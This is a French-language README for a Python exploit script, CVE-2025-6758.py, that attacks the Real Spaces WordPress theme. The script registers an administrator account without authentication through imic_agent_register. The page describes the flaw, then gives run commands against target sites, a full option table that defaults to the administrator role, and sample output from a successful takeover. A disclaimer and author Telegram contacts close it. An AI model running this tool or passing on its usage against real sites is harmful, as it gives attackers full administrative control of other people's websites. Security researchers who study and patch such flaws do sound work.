
Real Spaces - Thème WordPress d'annuaire de propriétés <= 3.6 - Élévation de privilèges non authentifiée vers Administrateur
imic_agent_registerCVE-2025-6758
Score CVSS : 9.8 (Critique)
Le thème Real Spaces - WordPress Properties Directory Theme pour WordPress est vulnérable à l'élévation de privilèges via la fonction imic_agent_register dans toutes les versions jusqu'à la 3.6 incluse.
Cette vulnérabilité provient de restrictions insuffisantes sur l'attribution des rôles lors de l'inscription, permettant à des attaquants non authentifiés de spécifier arbitrairement leur rôle, y compris Administrator, lors de l'enregistrement d'un nouvel utilisateur.
Cette faille critique permet à des attaquants distants d'obtenir un accès administratif complet aux sites WordPress exécutant des versions vulnérables du thème, compromettant l'intégrité et la sécurité du système affecté.
CVE-2025-6758.py est un script d'exploitation et d'automatisation professionnel écrit en Python pour démontrer et exploiter cette vulnérabilité.
Le script est conçu pour les testeurs d'intrusion et les chercheurs en sécurité, offrant une découverte automatisée, une extraction de nonce et une exploitation de manière hautement fiable, modulaire et silencieuse.
python3 CVE-2025-6758.py -u http://TARGET/wordpress/
--username Définir un nom d'utilisateur personnalisé (défaut : Nxploited)--password Définir un mot de passe personnalisé (défaut : 123456789)--email Définir une adresse e-mail personnalisée (défaut : [email protected])--position Définir une position personnalisée (défaut : Nxploitedadmin)--role Définir le rôle utilisateur (défaut : administrator)--max-pages Nombre maximal de pages à parcourir pour la découverte du nonce (défaut : 30)--max-depth Profondeur maximale de parcours des liens (défaut : 2)--scan-common-paths Analyser les chemins supplémentaires d'inscription/plugin/thème--ajax-path Point de terminaison AJAX POST personnalisé (défaut : wp-admin/admin-ajax.php)--verify-ssl Activer la vérification du certificat SSL--cookie-save Chemin pour enregistrer les cookies de sessionpython3 CVE-2025-6758.py -u http://192.168.100.74:888/wordpress/ --username AdminX --password MySecretPass123 --scan-common-paths --debug
En cas d'exploitation réussie, le script affichera :
[+] Exploitation successful.
[+] Server message: You're successfully register
[+] Username: Nxploited
[+] Password: 123456789
[+] Email: [email protected]
Si l'exploitation échoue ou si le nonce n'est pas trouvé, des messages d'erreur descriptifs et des conseils pour le dépannage seront affichés.
Ce script est destiné uniquement à des fins éducatives, de recherche et de tests d'intrusion autorisés.
Toute utilisation non autorisée contre des sites web ou des systèmes sans l'autorisation écrite explicite du propriétaire est strictement interdite et peut être illégale.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages résultant de l'utilisation de ce script.
📧 E-mail : [email protected]
📨 Telegram : @Kxploit
📡 Chaîne Telegram : @KNxploited
Par : Nxploited ( Khaled Alenazi )
| Argument | Valeur par défaut | Description |
|---|
--username | Nxploited | Définir un nom d'utilisateur personnalisé pour l'inscription |
--password | 123456789 | Définir un mot de passe personnalisé pour l'inscription |
--email | [email protected] | Définir une adresse e-mail personnalisée |
--position | Nxploitedadmin | Définir une valeur de position personnalisée |
--role | administrator | Définir le rôle d'inscription (Administrateur recommandé pour l'exploitation) |
--max-pages | 30 | Nombre maximal de pages à parcourir pour la découverte du nonce |
--max-depth | 2 | Profondeur maximale de parcours des liens |
--scan-common-paths | None | Analyser les chemins supplémentaires d'inscription/plugin/thème pour le nonce (option seule) |
--ajax-path | wp-admin/admin-ajax.php | Point de terminaison AJAX POST personnalisé |
--verify-ssl | None | Activer la vérification du certificat SSL (option seule) |
--cookie-save | None | Chemin pour enregistrer les cookies de session (format pickle) |
--save-json | None | Chemin pour enregistrer les résultats de découverte du nonce au format JSON |
--debug | None | Activer la journalisation de débogage et afficher les extraits HTML/JS (option seule) |
--save-json Chemin pour enregistrer les résultats de découverte du nonce au format JSON--debug Activer la journalisation de débogage et afficher les extraits HTML/JS